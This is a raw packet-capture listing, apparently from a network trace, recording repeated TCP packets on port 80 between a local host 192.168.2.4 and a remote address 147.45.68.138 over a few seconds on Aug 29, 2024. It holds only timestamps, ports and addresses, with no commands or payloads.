                                                      Aug 29, 2024 22:52:22.675661087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675674915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675688028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675688982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675697088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675704002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675718069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675723076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675735950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675746918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675764084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675770044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675775051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675790071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675803900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675812960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675818920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675831079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675833941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675841093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675849915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675862074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675865889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675879955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675900936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695637941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695692062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695704937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695707083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695746899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695751905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695782900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695799112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695806026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695815086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695822954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695833921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695843935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695858002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695868969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695871115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695883989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695899010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695905924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695915937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695924044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695935011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695945978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695961952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.695990086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.695991993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696007013 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696013927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696033001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696044922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696046114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696060896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696075916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696077108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696091890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696096897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696106911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696109056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696124077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696126938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696139097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.696145058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696161985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.696168900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.698724031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.698739052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.698753119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.698771954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.698793888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.698947906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.698985100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699002981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699018002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699042082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699050903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699085951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699100971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699115038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699126959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699129105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699136972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699146032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699157000 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699172974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699198961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699223042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699238062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699250937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699259996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699266911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699273109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699282885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699291945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699299097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699311018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699315071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699331045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699346066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699359894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699368000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699373007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699383020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699404001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699408054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699424982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699429989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699444056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699444056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699460983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699470997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699476004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699477911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699489117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699515104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699525118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699529886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699546099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699549913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699561119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699573040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699575901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699583054 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699592113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699603081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699606895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699616909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699628115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699639082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699642897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699645996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699659109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.699675083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.699692965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.708652020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.708667040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.708682060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.708707094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.708745956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.708771944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.708810091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.860272884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.860301018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.865690947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.865770102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.865823984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.865839958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.865861893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:23.632558107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:23.632646084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:23.764925957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:23.764961958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:23.769797087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:23.769830942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:23.769870996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:24.489255905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:24.489419937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:24.505171061 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:24.509953022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:25.225014925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:25.225076914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:25.685971975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:25.690850973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.396720886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.396800041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.428225994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.433074951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.613811016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.613826990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.613837004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.613955975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.613967896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.613976955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.613977909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.613987923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614000082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614001036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614012957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614023924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614027023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614033937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614051104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614065886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614094019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614104986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614114046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614125013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614131927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614137888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614161015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614175081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614186049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614197016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614206076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614217043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614223957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614228010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614247084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614269018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614309072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614319086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614330053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614341974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614347935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614353895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614370108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614372015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614402056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614417076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614779949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614790916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614801884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614826918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614852905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614937067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614948988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614959002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614969015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614979982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.614980936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.614990950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615001917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615022898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615046978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615086079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615089893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615106106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615127087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615139961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615206957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615217924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615226984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615242958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615252018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615256071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615274906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615284920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615300894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615303993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615315914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615324020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615330935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615339041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615344048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615353107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615355015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615370989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615390062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615403891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615415096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615416050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615426064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615438938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615442038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615448952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615469933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615600109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615643024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615648031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615655899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615688086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615784883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615799904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615812063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615822077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615823984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615835905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615847111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615850925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615875959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615889072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615925074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615936995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615947962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615959883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615969896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615971088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615983963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.615993977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.615994930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616018057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616039991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616076946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616087914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616097927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616121054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616122007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616133928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616146088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616144896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616168022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616175890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616183996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616190910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616203070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616211891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616214037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616235018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616255045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616584063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616595030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616604090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616627932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616652012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616683006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616713047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616724968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616725922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616748095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616765022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616816998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616828918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616838932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616851091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616861105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616884947 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616908073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616923094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616934061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616945028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616950035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616955996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616969109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616975069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.616975069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.616995096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617022038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617027998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617068052 CEST4973980192.168.2.4147.45.68.138
